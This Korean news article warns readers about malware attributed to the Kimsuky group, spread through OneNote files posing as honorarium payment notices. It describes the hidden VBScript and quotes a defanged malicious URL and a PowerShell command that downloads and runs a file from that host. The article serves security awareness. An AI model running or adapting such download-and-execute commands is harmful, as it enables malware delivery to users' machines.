사례비 지급 위장한 악성코드 주의!

2023.03.23 11:06:02

특정 경고창이 뜰 때 아무 생각 없이 ‘확인’ 단추 누르면 안 돼
슬기로운 컴퓨터ㆍ손말틀(휴대전화) 쓰기를 위한 귀띔

[우리문화신문=김영조 기자]  사례비 지급 내용으로 위장한 악성코드가 유포되고 있다. 원노트(OneNote)를 악용한 이 악성코드는 지난달 암호 파일 형태로 악성코드를 유포했던 김수키(Kimsuky) 해커 조직의 소행으로 추정된다. 사칭 대상, VB스크립트(VBScript) 파일의 악성 행위 등이 매우 비슷하기 때문이다. 이번에는 악성코드가 어떤 과정을 거쳐 유포됐는지 자세히 알아보자.​

 

 

원노트 파일을 활용한 공격은 올해 1월 중순부터 등장하기 시작해 점점 느는 추세다. MS오피스(MS Office)의 ‘제한된 보기’와 윈도우 보안 툴 ‘MOTW(Mark of the Web)’를 우회하며, 원노트 파일 안에 VB스크립트, WSF, HTA 등의 파일 형식을 포함하는 것을 허용한다는 취약점을 안고 있다. 이들 파일은 실행할 때 특정 경고창이 뜨지만, 대다수 사용자는 아무 생각 없이 경고창에서 ‘확인’ 단추(버튼) 누른다. 이때 악성 스크립트가 실행되는 것이다.

 

이번에 확인된 원노트 파일은 [그림 1]처럼 사례비 지급 내용을 담고 있으며, 첨부된 한글 파일을 누르라고(클릭) 유도한다.

 

 

하지만 이 한글 파일이 있는 곳에는 [그림 2]와 같이 personal.vbs 명의 악성 스크립트 개체가 숨어 있다.

 

​사용자가 첨부 파일을 누르면 악성 VB스크립트 파일이 personal.vbs 명으로 임시 경로에 생성하고 실행된다. 생성된 VB스크립트 파일 코드는 [그림 3]과 같이 난독화된 명령어를 주석처럼 표시한 뒤, 이를 다시 읽어 복호화한다. 그런 다음 악성 명령어를 실행한다.​

 

 

​복호화된 스크립트 코드는 마지막에 hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1에 접속해 추가 스크립트 코드를 실행한다. 현재는 해당 인터넷 주소(URL)에 접속할 수 없지만, URL 형식을 보면 정보 유출 스크립트를 내려받아 실행한 것으로 추정된다.

 

이후 파워셸(PowerShell) 명령어를 통해 hxxp://delps.scienceontheweb.net/ital/info/sample.hwp에서 한글 파일을 내려박고 실행한다.

 

실행되는 파워셸 명령어

 

​powershell $curpath=(New-Object -ComObject Shell.Application).NameSpace(‘shell:Downloads’).Self.Path;Invoke-WebRequest -Uri hxxp://delps.scienceontheweb.net/ital/info/sample.hwp -OutFile $curpathpersonal.hwp;start-sleep -seconds 1

 

​원노트 악성코드는 사용자를 속이기 위해 정상적인 한글 문서를 내려받는 것으로 추정된다. 원노트에 작성된 한글 파일명은 지난주 소개한 ‘패스워드 파일 형태로 유포 중인 악성코드’ 사례와 같게 ‘개인정보이용동의서.hwp’인 것으로 확인된다. 따라서 실행된 한글 문서 양식이나 이와 비슷했을 것으로 보인다.

 

최근 김수키(Kimsuky) 그룹은 이제 워드 문서뿐만 아니라 CHM, LNK, 원노트 등 다양한 유형의 악성코드를 유포하고 있다. 해당 파일들은 주로 사례비 또는 개인정보 양식으로 위장해 번개글(이메일)로 유포되고 있어 실행 시 주의해야 한다.

 

자세한 내용은 ASEC 블로그를 통해 확인할 수 있다.

 

​▶ASEC 블로그 바로가기

 

                                                                                  AhnLab 콘텐츠기획팀 제공

 

 

김영조 기자 pine9969@hanmail.net
Copyright @2013 우리문화신문 Corp. All rights reserved.


서울시 영등포구 영신로 32. 그린오피스텔 306호 | 대표전화 : 02-733-5027 | 팩스 : 02-733-5028 발행·편집인 : 김영조 | 언론사 등록번호 : 서울 아03923 등록일자 : 2015년 | 발행일자 : 2015년 10월 6일 | 사업자등록번호 : 163-10-00275 Copyright © 2013 우리문화신문. All rights reserved. mail to pine9969@hanmail.net